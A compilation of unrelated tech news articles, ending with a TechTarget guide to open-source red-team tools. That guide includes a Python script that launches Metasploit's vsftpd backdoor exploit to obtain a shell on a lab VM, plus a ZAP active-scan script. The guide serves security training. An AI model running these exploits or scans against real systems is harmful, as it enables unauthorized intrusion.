Boeing’s Starliner capsule corroded due to high humidity levels, NASA explains, and the spaceship won’t fly this year – The Register

Boeing's CST-100 Starliner capsule, designed to carry astronauts to and from the International Space Station, will not fly until the first half of next year at the earliest, as the manufacturing giant continues to tackle an issue with the spacecraft's valves.

Things have not gone smoothly for Boeing. Its Starliner program has suffered numerous setbacks and delays. Most recently, in August, a second unmanned test flight was scrapped after 13 of the 24 valves in the spacecraft's propulsion system jammed. In a briefing this week, Michelle Parker, chief engineer of space and launch at Boeing, shed more light on the errant components.

Boeing believes the valves malfunctioned due to weather issues, we were told. Florida, home to NASA's Kennedy Space Center where the Starliner is being assembled and tested, is known for hot, humid summers. Parker explained that the spacecraft's oxidizer, dinitrogen tetroxide, reacted with water condensation inside the valves to form nitric acid. The acid corroded the valves, causing them to stick.

Engineers managed to free nine of the 13 faulty valves, but four remained stuck. The capsule was returned to the factory, and two valves have been removed and handed to NASA for further analysis, with a third on the way. Boeing said it will not resume flight tests of its CST-100 Starliner module until the first half of next year.

NASA astronauts Nicole Mann and Josh Cassada, who were expected to fly aboard Boeing's first official crewed flight for its Starliner-1 mission, will now hitch a ride to the ISS as part of Crew-5, a SpaceX mission in the second half of 2022.

"NASA decided it was important to make these reassignments to allow Boeing time to complete the development of Starliner," the US agency previously said, "while continuing plans for astronauts to gain spaceflight experience for the future needs of the agency's missions."

Veteran astronauts Butch Wilmore and Mike Fincke remain assigned to fly on Starliner. An official launch date hasn't been set; it will depend on whether Boeing fixes its valve issue, successfully pulls off an uncrewed orbital test flight, and clears other NASA-mandated checks.

Microsoft emits more Win 11 fixes for AMD speed issues and death by PowerShell bug – The Register

Microsoft has released a build of Windows 11 that it claims addresses performance problems the new OS imposed on some systems.

Redmond's announcement of OS Build 22000.282 lists over 60 "improvements and fixes" on top of a lucky 13 "highlights".

One of those highlights is described as fixing "an issue that causes some applications to run slower than usual after you upgrade to Windows 11 (original release)".

Another addresses an issue that could cause Bluetooth mice and keyboards "to respond slower than expected". A third "improves the time estimate for how long you might wait to use your device after it restarts".

Some of the improvements and fixes offer meatier fare, among them addressing "an L3 caching issue that might affect performance in some applications on devices that have AMD Ryzen processors after upgrading to Windows 11 (original release)".

AMD users have, quite reasonably, been rather miffed at being singled out, and more miffed still that their concerns weren't addressed in the first bundle of Win 11 fixes issued last week.

Another fix prevents PowerShell from eating a PC alive by creating an infinite number of child directories. "This issue occurs when you use the PowerShell Move-Item command to move a directory to one of its children. As a result, the volume fills up and the system stops responding," Microsoft explained.

If Server Manager has disappeared while you use Windows 11, Microsoft has found the cause for its absence: silly you, for installing Server Manager using the Remote Server Administration Tools and then using it to remove some features from Hyper-V.

Distorted fonts for Asian alphabets have been clarified, Microsoft Office has been restored to operability after Windows Defender Exploit Protection prevented it from running "on machines that have certain processors," and an issue that could prevent successful printer installation with Internet Printing Protocol has been erased.

Microsoft's Windows teams appear to be rather busy. On the same day as the new Windows 11 fixes were delivered, the IT giant also announced the all-but-final cut of Windows 10 it will use for the Windows 10 November 2021 update.

"We believe that Build 19044.1288 is the final build for the November 2021 Update," wrote Brandon LeBlanc, a senior manager on the Windows Insider Program.

Insiders can get their hands on the November update in the Release Preview Channel on Windows 10 via Microsoft's "seeker" experience in Windows Update.

"This means Insiders currently on Windows 10, version 21H1 (or lower) in the Release Preview Channel will need to go to Settings > Update & Security > Windows Update and choose to download and install Windows 10, version 21H2," LeBlanc explained.

Microsoft previously teased a modest set of additions to Windows 10 in this update, headlined by Wi-Fi security improvements and GPU compute support in the Windows Subsystem for Linux (WSL) and Azure IoT Edge for Linux on Windows (EFLOW) environments.

Another major feature the 'softies previously promised would appear in the update, a Windows Hello for Business deployment method called "cloud trust", has dropped out of the release.

LeBlanc described it as "still under development" and now due to appear "in a future monthly update to the November 2021 Update".

"We will provide more information as this feature gets closer to availability," the post added. Information on exactly when the 21H2 update will make its mainstream debut is also in the "coming-real-soon-now-we-promise" bucket.

Unvaccinated and working at Apple? Prepare for COVID-19 testing ‘every time’ you step in the office – The Register

Apple will require unvaccinated workers to get tested for COVID-19 every time they come into the office for work, starting from November 1.

Employees have been told to declare whether they've been vaccinated or not by October 24, Bloomberg reported this week. Staff who choose not to disclose their vaccination status will be subjected to COVID-19 testing whenever they enter the office, it's said.

The iGiant has again and again pushed back the date it wants its staff to return to their desks as the coronavirus continues romping around the planet. Although it hoped workers could go back to their campuses this autumn, now the plan is to get them working at least three days a week at their office desks from some time in January 2022.

So far this concerns office workers. The rules are a little different for people manning the Apple Stores. Many have already returned to the physical retail shops, and those that remain unvaccinated will be required to be tested for COVID-19 twice a week.

Rapid do-it-yourself test kits will be made available for employees in Apple offices and retail stores, and, of course, there's an app for that, on which staff will self-report their status.

Apple's latest safety protocols to tackle the bio-nasty fall short of a blanket vaccine mandate for all employees. Other tech companies have been more stringent: Google, Facebook, and IBM, for example, have made it clear staff must be fully vaccinated before they can go back to their work campuses.

Big Blue is more hardcore still, and has said it will suspend employees without pay from December 9 if they choose to remain unvaccinated, regardless of whether they're continuing to work from home or not. IBM said it has to follow rules set by President Joe Biden, who signed an executive order stating that federal contractors and subcontractors must be vaccinated.

The Register has asked Apple for comment.

No swearing or off-brand comments: AWS touts auto-moderation messaging API – The Register

AWS has introduced channel flows to its Chime messaging and videoconferencing API, the idea being to enable automatic moderation of profanity or content that "does not fit" the corporate brand.

Although Amazon Chime has a relatively small market share in the crowded videoconferencing market, the Chime SDK is convenient for developers building applications that include videoconferencing or messaging, competing with SDKs and services from the likes of Twilio or Microsoft's Azure Communication Services. In other words, this is aimed mainly at corporate developers building applications or websites that include real-time messaging, audio or videoconferencing.

The new feature is for real-time text chat rather than video and is called messaging channel flows. It enables developers to create code that intercepts and processes messages before they are delivered. The assumption is that this processing code will run on AWS Lambda, its serverless platform.

A post by Chime software engineer Manasi Surve explains the thinking behind the feature in more detail. It is all about moderation, and Surve describes how to "configure a channel flow that removes profanity and certain personally identifiable information (PII) such as a social security number."

She further explains that corporations need to prevent accidental sharing of sensitive information, and that social applications need to "enforce community guidelines" as well as avoid "content shared by users that does not fit their brand." A previous approach to the same problem worked only after the message had been posted, which is too late in many scenarios.

It is telling that Surve observes that "human moderation requires significant human effort and does not scale."

"Automate everything" is a defining characteristic of today's cloud giants, even though moderation automation has not always been successful.

Surve said: "Amazon Comprehend helps remove many of the challenges," this service being for natural language processing and having the ability, when suitably trained, to detect "key phrases, entities and sentiment" to automate further actions.

The simple example presented by Surve does not use Comprehend for profanity but "simply a banned word list," though she adds that "you can also use Comprehend for profanity, but you will need to train your own model." Comprehend is used for detecting a social security number.
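
To make the pattern concrete, here is a minimal Python sketch of that filtering step, in the spirit of Surve's walkthrough but not her actual code: the banned words and the SSN regex are stand-ins, and the Chime-specific Lambda event parsing and callback plumbing are deliberately omitted.

```python
import re

# Hypothetical banned-word list; a real deployment would load this
# from configuration rather than hard-code it.
BANNED_WORDS = {"darn", "heck"}

# Naive pattern for US social security numbers (e.g. 123-45-6789).
# Surve's walkthrough detects SSNs with Amazon Comprehend; a plain
# regex is used here only to keep the sketch self-contained.
SSN_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


def sanitize(message: str) -> str:
    """Mask banned words and SSN-like strings before delivery."""
    # Redact anything that looks like a social security number.
    message = SSN_PATTERN.sub("***-**-****", message)
    # Star out banned words, case-insensitively.
    for word in BANNED_WORDS:
        message = re.sub(re.escape(word), "*" * len(word),
                         message, flags=re.IGNORECASE)
    return message


if __name__ == "__main__":
    print(sanitize("Heck, my SSN is 123-45-6789"))
    # -> ****, my SSN is ***-**-****
```

In the real feature, logic like this runs inside a Lambda function registered as a channel flow processor, with the (possibly rewritten) message handed back to the Chime SDK messaging service before delivery continues.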

Users are skilled in getting around automated filters and we suspect that training Comprehend to sanitise every kind of profanity or off-brand message a user could devise will be challenging.

There are other possible use cases for channel flows, for example looking up a support article automatically in order to show the user a link, sending an alert, or analysing sentiment, though in these cases it may not matter so much whether the processing takes place before or after a message is sent to others in the same channel.

After more than a decade of development, South Korea has a near miss with Nuri rocket test – The Register

South Korea today came close to joining the small club of nations that can build and launch their own orbital-class rockets, with its maiden attempt blasting off successfully then failing to deploy its payload.

At 5pm local time (UTC+9), the rocket, named Nuri, or KSLV-II, left its launchpad at Naro Space Center, destined for low-Earth orbit with a 1.5-ton dummy payload. But while all three stages of the Korea Space Launch Vehicle II worked and the initial payload separation was fine, the dummy satellite was not placed into orbit as planned.

It wasn't immediately clear what went wrong, although South Korean President Moon Jae-in, speaking from the Naro spaceport, said the payload did not stabilize in orbit after separation. It appears the rocket's third-stage engine stopped running after 475 seconds, about 50 seconds earlier than planned, leading to the failed deployment.

According to Reuters, Moon said of the partly failed test: "It's not long before we'll be able to launch it exactly into the target trajectory."

The mission was scheduled for 4pm local time but was delayed an hour to allow for valve checks and a wind assessment. The Korea Aerospace Research Institute (KARI) had pegged the mission's chance of success at 30 per cent.

South Korea would have been the seventh nation to launch its own rocket carrying over a tonne of payload into space, following in the footsteps of Russia, the US, France, China, Japan, and India.

The launch represents 11 years of work by the likes of KARI and approximately 300 private companies. In 2013, South Korea launched its first space rocket, Naro, or KSLV-I, with some help from Russian technology, but experienced several delays and two failed launches before eventually succeeding.

South Korea has been behind on its space endeavors, partly due to a 1979 Cold War-era agreement with the US that limited the country's ability to develop and test ballistic missiles of significant range. Those restrictions were amended in 2020, leaving South Korea free to use solid rocket motors without restriction and clearing the way for its space program.

Meanwhile, countries like China and Japan have developed their own space programs, leaving some catching up to do for South Korea in both military and civilian capacities.

A successful program could help South Korea get a foothold in 6G and keep tabs on North Korea, which has a military nuclear weapons program. South Korea does not, although politicians and officials have pushed for one and even implied in the past that Nuri could be a nuclear weapon precursor.

The three-stage rocket consists of about 370,000 parts, is just over 47 metres long, and has six liquid-fueled engines.

The first stage uses four clustered 75-ton engines and separates at 50km altitude. The second stage uses a single 75-ton engine that separates at 240km. The third stage uses a seven-ton engine to take the payload to its final destination of an orbit between 600 and 800km.

KARI plans to follow up the endeavour by sending a 200kg satellite into low-Earth orbit by May 2022. A lunar orbiter is slated for August 2022, with hopes of sending a spaceship to the Moon by 2030.

Huawei appears to have quenched its thirst for power in favour of more efficient 5G – The Register

MBB Forum 2021: The "G" in 5G stands for Green, if the hours of keynotes at the Mobile Broadband Forum in Dubai are to be believed.

Run by Huawei, the forum was a mixture of in-person event and talking heads over occasionally grainy video, and kicked off with an admission by Ken Hu, rotating chairman of the Shenzhen-based electronics giant, that adoption of 5G, with its promise of faster speeds, higher bandwidth, and lower latency, was still quite low for some applications.

Despite the dream five years ago, that the tech would link up everything, "we have not connected all things," Hu said.

It was a refreshingly frank assessment, sandwiched between the usual cheerleading for 5G. A distinct change of tack could be detected from the normal trumpeting of raw performance to an acknowledgement that power consumption would need to be reduced amid concerns about efficiency.

On that note, we'll draw a veil over the fact that the event's host, Dubai, features an indoor ski slope on the edge of a desert.

Hu ticked off a shopping list of things that hadn't quite happened in the 5G world just yet: there are now 10,000 "5GtoB" projects in the world, but more than half are in China, and industry has yet to see its promised redefinition. 5GtoB is Huawei's B2B 5G services punt, which includes a network, a NaaS offering, a 5G app engine, and a marketplace.

There had been great hopes for virtual reality and 360 broadcasting, but neither had taken off. And so it went on.

That said, Hu also noted faster-than-expected growth in some areas, claiming over 1.5 million base stations and 176 commercial 5G networks were up and running along with more than half a billion 5G users (smartphone users and industry modules).

Hu also reckoned plenty of opportunities lay ahead. The pandemic had accelerated digital transformation by approximately seven years, he said, and consumers had hopped online and were voraciously consuming services such as video streaming. As well as the increasing trend toward cloud applications, there was a demand for decent wireless home broadband.

Fertile ground for 5G and 5.5G, for sure.

Getting latency down to 10ms and upping the bandwidth are key, said Hu, as he wheeled out the industry buzzword of the moment: the metaverse. After all, if AR and VR haven't taken off as hoped, there is always extended reality, or XR.

And then there is a growing awareness among the population that perhaps shoving yet more power-hungry gizmos into data centres might not be the best approach. But hey, Huawei has just the 5G (and 5.5G) and networking tech for that, assuming you live in a country that hasn't banned its tech.

"We can't do anything about that," a spokesperson told The Register with a hint of a smile.

Huawei's kit is famously being pulled out of UK networks amid mistrust of the Chinese government, although it continues to install its telecommunications technology elsewhere. As well as telco representatives from the Middle East, the likes of Vodafone turned up via video link to extol the virtues of 5G.

Konstantinos Masselos, President of Greece's Hellenic Telecommunications & Post Commission, spoke in person about spectrum strategy, even as the backdrop behind him strobed like a ZX Spectrum loading screen.

Naturally, Huawei was keen to show off its other toys. The AR and XR department was taken care of by a display showing a customer garbed in virtual traditional attire thanks to an Azure Kinect DK camera and a big screen. An electric car was also on show, hoped to be a showcase for Huawei's dream of a connected automobile world, but sadly lacking its battery thanks to problems getting the units shipped into the UAE. There's perhaps a metaphor in there somewhere.

5G technology is critical for Huawei as the company faces sanctions around the world. The banhammer was dropped in the UK last year, prohibiting telcos from purchasing its kit and removing what had already been installed by 2027. US sanctions have played a role in a decline in the company's revenues as components have become difficult to source for products such as smartphones. That said, back in August, rotating chairman Eric Xu remained bullish about the company's enterprise and carrier business (excluding the likes of the UK, of course).

While some countries might regard Huawei with some suspicion, others appear more than happy to fit out data centres with its tech, poor firmware engineering processes or not.

Overall, the theme of the 2021 Mobile Broadband Forum was a recognition that the world had changed in the last two years. Raw performance seemed to take a back seat to the potential for power savings and efficiency improvements as old kit gradually gets replaced with new over the coming years.

While XR might seem a contender for next year's hypewagon, a renewed emphasis on industry applications and standards for 5G seems a good deal more realistic.

The Register attended MBBF 2021 as a guest of Huawei.

New Relic CodeStream plugs observability directly into developer workflows in the IDE – Diginomica

(New Relic CodeStream screenshot)

New Relic yesterday brought observability directly into developer workflows with the acquisition of CodeStream, a collaboration tool that sits inside popular Integrated Development Environments (IDEs) and also integrates to a range of other tools, from GitHub to Jira and Slack. A new version of CodeStream that integrates with the New Relic One observability platform is able to surface application telemetry data directly within the IDE at the relevant point in the code, so that developers can instantly get to work on resolving issues. We spoke to Peter Pezaris, CodeStream CEO and Founder, and Buddy Brewer, GVP and GM, New Relic, to find out more about the news.

The company believes the new product, along with a new pricing tier, will broaden New Relic's appeal among developers whose primary role is coding, rather than the traditional users of monitoring and observability tools, who focus on operational uptime and reliability. Customers will also get extra value from their investment in collecting and analyzing telemetry data, as Brewer explains:

Especially with the shift to cloud, and decomposing monoliths into the containerization of software, there is so much telemetry out there, that it's a massive investment that companies are making. The value of that investment can extend so much further than just utilizing that data when the software is on fire ...

By bringing that telemetry data into the IDE (I think there's like 14 IDEs that are supported by CodeStream) you can incorporate this data into your IDE. It allows those developers to access that data when they're planning and they're building software, not just when they're running it. We think that'll help them get a lot more value out of the investment in telemetry and also help them build better software.

One of the most compelling examples of how the newly integrated product blurs the line between building code and running it in production is the integration with New Relic Errors Inbox. This recently introduced and already popular capability provides a single location for viewing and dealing with errors from anywhere across the application stack, with the ability to see detail down into the stack trace. But as Pezaris points out, for all its convenience, what do you do then? There's a button to copy the stack trace to a clipboard, but it's up to you to then work out where to go next. Whereas with the integration to CodeStream, all of those next steps are automatically done for you. He explains:

Now you'll be able to click on that stack trace, and you'll open it up right in your IDE. We'll check you out to the right repo. We'll open up the build SHA that was used to build that production artefact. And now that stack trace becomes clickable. So you can click through to all the stack frames, go right to the parts of the code where the problem's happened.

Because CodeStream's good at collaboration, every time you do that, we'll tell you who wrote that code. You can easily bring them into the conversation, swarm the issue between production and non-production engineers, and get to the root cause of the problem faster. We'll also keep track of who's been assigned which errors. So now every time you open up your IDE, you get to see all the errors that are assigned to you, so you can investigate and solve those problems.

Another feature uses integration to Pixie, the technology acquired by New Relic last year, which automatically collects telemetry data from deep inside application code running in Kubernetes clusters. With dynamic logging, a developer who wants to instrument a particular function in their source code to see how it's running in production, can invoke Pixie directly from their code editor to insert a probe and start logging straight away. Pezaris explains:

You can right-click on it and say, 'Start instrumenting that thing.' And then you will get feedback in real time in your editor, without having to do a deployment. You don't have to commit code, you don't have to change code, you don't have to push code. Just immediately, you'll start to get logging back for every call to that function.

As part of the announcement, New Relic highlighted its partnership with Microsoft around CodeStream, which works with the VS Code and Visual Studio IDEs, and also integrates to GitHub and Teams. Commenting in a joint press release, Scott Guthrie, Executive Vice President, Cloud + AI, Microsoft, welcomed the news of the acquisition, stating:

Tighter collaboration between development projects and improved connections between existing applications are just some of the benefits New Relic CodeStream will provide to the developer community.

To help encourage adoption, there will be a new Core user pricing option for New Relic One, starting at $49 per user per month, plus usage charges based on the volume of telemetry data. Developers can sign up for a free account for a preview period ending in January, after which some features will require a paid license.

Joining forces with CodeStream, which is effectively a Disrupt for coders but with a lot of the integration chops of a Slack built in too, is a huge step up for New Relic in furthering its mission of data-driven software, which was a big theme of its FutureStack conference earlier this year. It helps to close the loop on ensuring that the people building software have as much access to telemetry about how it runs in production as those charged with running it. That can only improve quality and performance.

It's also a great illustration of why collaboration inside of the applications where people spend much of their working day is just as important and valuable as collaboration around them in applications such as Teams and Slack. It also highlights the value of integration that automates the futzing around that otherwise wastes people's time as they move information from one place to another and put it in the right context before getting to work on it. When I write about Frictionless Enterprise, this is exactly the kind of thing I'm talking about.

AWS admits cloud ain’t always the answer, intros on-prem vid-analysing box – The Register

Amazon Web Services, the outfit famous for pioneering pay-as-you-go cloud computing, has produced a bit of on-prem hardware that it will sell for a one-off fee.

The device is called the "AWS Panorama Appliance" and the cloud colossus describes it as a "computer vision (CV) appliance designed to be deployed on your network to analyze images provided by your on-premises cameras".

"AWS customers agree the cloud is the most convenient place to train computer vision models thanks to its virtually infinite access to storage and compute resources," states the AWS promo for the new box. But the post also admits that, for some, the cloud ain't the right place to do the job.

"There are a number of reasons for that: sometimes the facilities where the images are captured do not have enough bandwidth to send video feeds to the cloud, some use cases require very low latency," AWS's post states. Some users, it adds, "just want to keep their images on premises and not send them for analysis outside of their network".

Hence the introduction of the Panorama appliance, which is designed to ingest video from existing cameras and run machine learning models to do the classification, detection, and tracking of whatever your cameras capture.

AWS imagines those ML models could well have been created in its cloud with SageMaker, and will charge you for cloud storage of the models if that's the case. The devices can otherwise run without touching the AWS cloud, although there is a charge of $8.33 per month per camera stream.

The appliance itself costs $4,000 up front.
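
Putting those figures together: a hypothetical ten-camera deployment run for three years would come to $4,000 up front plus roughly $3,000 in stream charges (10 streams × $8.33 per month × 36 months ≈ $2,999), before any cloud fees for model storage.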

Charging for hardware is not AWS's usual modus operandi. Its Outposts on-prem clouds are priced on a consumption model. The Snow range of on-prem storage and compute appliances are also rented rather than sold.

The Panorama appliance's specs page states that it contains Nvidia's Jetson Xavier AGX AI edge box, with 32GB RAM. The spec doesn't mention local storage, but lists a pair of gigabit ethernet ports, the same number of HDMI 2.0 slots, and two USB ports.

AWS announced the appliance at its re:Invent gabfest in December 2020, when The Register opined that the cloudy concern may be taking a rare step into on-prem hardware, but by doing so would be eating the lunches of server-makers and video hardware specialists alike. Panorama turns out not to have quite the power to drive cloud services consumption of other Amazonian efforts, since the ML models it requires could come from SageMaker or other sources. That fact, and the very pre-cloud pricing scheme, mean the device could be something of a watershed for AWS.

All of Twitch’s Source Code Was Just Leaked by Hackers – Interesting Engineering

An anonymous hacker breached Twitch and posted more than 100GB of data, including the platform's source code, as an online torrent on Wednesday, according to an initial report from Video Games Chronicle that was later confirmed by Twitch.

And it's not just the source code that the hacker made open-source. The million-dollar payout details for top Twitch streamers were also leaked.

"We can confirm a breach has taken place," read a tweet from Twitchconfirming the hack as legitimate. "Our teams are working to understand the extent of this. We will update the community as soon as additional information is available. Thank you for bearing with us." A Fortnite streamer called "BBG Calc" said "The earnings list got my figure 100% correct," according to a BBC report on the breach. A different streamer also said the earnings listed in the leaked information were "accurate," and yet another person who spoke to BBC with close ties to a major influencer on the platform said the details included in the breach are "about right."

The documents detailing the sensitive financial information showed up on online forums with payment records stretching from August or September 2019 to October 2021, and some versions include figures for American streamer Summit1g, Canadian streamer xQC, the Dungeons & Dragons channel CriticalRole, and more. Twitch is renowned for its heavily guarded operational mechanisms and has touted the high-security features surrounding the figures paid to big-name streamers, which makes the breach especially sobering for the firm. The leak also comes as major rivals to Twitch, like YouTube Gaming, are starting to offer colossal salaries to popular gaming streamers. In other words, this breach could cost Twitch some major sources of income.

Beyond salary information, the leaked documents also appear to contain the actual source code of Twitch, along with technical details of forthcoming products and platforms. Security experts speaking with BBC cyber reporter Joe Tidy said the files also include internal server data meant exclusively for Twitch employees. If all of this information really got out, this would constitute one of the biggest data leaks ever seen from a single company, with its most highly prized, cherished, and tightly guarded information exposed to the world in a single hack.

Luckily for the major streamers, the list of payments included in the leaked information probably doesn't cover sponsorship deals or other off-platform transactions, nor does it account for taxes paid on streamers' income. It's also likely that most of the top-tier streamers are effectively their own large-scale media organizations, with employees, contractors, and independent business expenses, which means the final adjusted income after footing the bill for a streamer's entire business is probably not clear from the leaked list. Included in the breached data are folders named after crucial Twitch software, like "core config packages", "infosec" (information security), and "devtools" (developer tools). This by no means spells absolute doom for Twitch, but it could significantly impact the firm's business plans, future website design, and, most obviously, its system security infrastructure.

This was a breaking story and was regularly updated as new information became available.

5 open source offensive security tools for red teaming – TechTarget

One of the harder cybersecurity areas to develop and maintain a skill base for is the red team. For those on the offense side of the security equation -- for example, penetration testers -- it can be challenging to establish an initial set of skills and keep them sharp over the long term.

Other than large companies, few organizations can afford full-time red teams. So, unless you're employed by a service provider such as a consultancy or MSSP that offers offense-based services to clients, there are few positions relative to defenders.

Offensive skills training is also somewhat niche as the skills taught are less directly applicable to blue teamers. Additionally, specialized training can be expensive. This translates into organizations being reluctant to hire and train someone as opposed to hiring someone with a fully developed skill base.

How then does someone looking into a red team career path build foundational skills? One way is to hone and maintain the skills associated with using offensive security tools. But which ones?

Here are five popular open source offensive security tools to consider. There are many great commercial tools out there, but these open source options are accessible to everyone. This enables cybersecurity professionals to start practicing and build up their skill base immediately.

One important caveat: Just as these tools can help build fundamental and necessary skills in a lawful and ethical manner, so too can they be used for unlawful, unethical purposes. The onus is on users to make sure that their usage is both lawful and ethical.

The Metasploit Framework provides a common, standardized interface to many services of interest to pen testers, researchers and red teams. It includes working with exploits and payloads, as well as auxiliary tasks that don't use a payload.

Vulnerability researchers historically wrote exploitation scripts or proof-of-concept code for the exploits they discovered. This often led to usability challenges because some scripts were minimally documented, used nonstandard conventions, or were unreliable as a test harness to validate issues. The Metasploit Framework helped remedy these issues.

Metasploit is the de facto standard interface for working with exploit code and payloads. It normalizes how red teams and pen testers interact with exploit code. From the red team's point of view, it streamlines work by providing important services such as payloads -- i.e., shellcode -- so the red team can focus on the vulnerability itself. For the tester, it likewise provides a standard way to interact so they can concentrate on the issue they're testing and not the minutia of running the exploit code itself.

To get started with Metasploit, try the companion Metasploitable project. It provides a deliberately weakened VM to test usage and build skills.
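
If you would rather drive Metasploit from code than from the msfconsole prompt, the framework exposes an RPC interface, and the third-party pymetasploit3 library wraps it from Python. A minimal sketch, assuming a lab-only Metasploitable 2 VM and placeholder credentials and addresses:

```python
# Driving Metasploit over its RPC interface with the third-party
# pymetasploit3 library (pip install pymetasploit3). Assumes the RPC
# daemon was started first, e.g.:  msfrpcd -P s3cr3t
# The password and target address below are lab-only placeholders.
from pymetasploit3.msfrpc import MsfRpcClient

client = MsfRpcClient('s3cr3t', ssl=True)

# The vsftpd 2.3.4 backdoor is the canonical first exercise against
# a Metasploitable 2 VM.
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
exploit['RHOSTS'] = '192.168.56.101'  # your Metasploitable VM's address

payload = client.modules.use('payload', 'cmd/unix/interact')
exploit.execute(payload=payload)

# Any shell gained shows up as a session.
print(client.sessions.list)
```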

Offense involves more than just being able to run exploits. Particularly with web applications, it's important to be able to see and manipulate requests that occur between a browser and a web server. One category of tools that facilitates this is the attack proxy. These tools sit between a browser and a remote web server so users can examine and even manipulate traffic passing between the two. Attack proxies often also bundle automated mapping and crawling tools, automated website scanning tools, and informational utilities such as URL, hex, and Base64 encoders and decoders.

The Zed Attack Proxy (ZAP) from OWASP is a popular open source example.
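
ZAP can also be scripted, which is handy for building repeatable practice drills. Here is a minimal sketch using the official Python client (the python-owasp-zap-v2.4 package), assuming a ZAP instance already running locally on port 8080 and a lab target you are authorised to scan:

```python
import time

from zapv2 import ZAPv2  # pip install python-owasp-zap-v2.4

# Assumes a local ZAP instance listening on 127.0.0.1:8080; the API key
# and target URL are placeholders for your own lab setup.
zap = ZAPv2(apikey='changeme',
            proxies={'http': 'http://127.0.0.1:8080',
                     'https': 'http://127.0.0.1:8080'})
target = 'http://target.lab.example'

# Crawl the site so ZAP knows what is there.
scan_id = zap.spider.scan(target)
while int(zap.spider.status(scan_id)) < 100:
    time.sleep(2)

# Run the active scanner against everything the spider found.
scan_id = zap.ascan.scan(target)
while int(zap.ascan.status(scan_id)) < 100:
    time.sleep(5)

# Report whatever the scanner flagged.
for alert in zap.core.alerts(baseurl=target):
    print(alert['risk'], alert['alert'], alert['url'])
```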

An attack proxy is great for exercising the functionality of a remote website, but what if you want to attack a given user more directly? For example, to test the resilience of users' browser habits or test whether they would notice warning signs of being part of an attack chain.

One way to do this is by using tools that hook one or more tabs within a target's browser and provide some level of control to an attacker. This in turn can be used as a forward "staging area" by an attacker to gain further traction within an environment or move laterally. The Browser Exploitation Framework (BeEF) enables red teams to do exactly that.

The Atomic Red Team project is a set of scripts that can be used to simulate attacker activity. The project provides a set of portable tests, each mapped to the Mitre ATT&CK framework, which can be used to exercise protections and hardening strategies in an organization.

Atomic Red Team is a useful tool for red and blue team members. For the blue team, it's a helpful way to validate the controls protecting the environment. On the offense side, deconstructing attack techniques can help red teams understand how those techniques work and how to apply them.

One often-overlooked area is testing the resilience of users against manipulation, coercion and trickery. The Social-Engineer Toolkit (SET) provides mechanisms to quickly create artifacts that might appear legitimate to a user and that can be used to test different scenarios. With it, red teams can send legitimate-looking emails to target users, attempt a spear phishing attack containing malicious attachments, and spoof SMS messages.

These five are a tiny subset of the many fantastic tools available. Some other offensive security tools to learn include Wireshark to help examine network activity and special-purpose tools like Mimikatz and Molehunt.

To dig beyond this list, look to pen testing-focused Linux distributions such as Kali, BlackArch or Parrot. These distributions pull together hundreds of specialized tools all in one place, which can help red teams learn which tools do what.
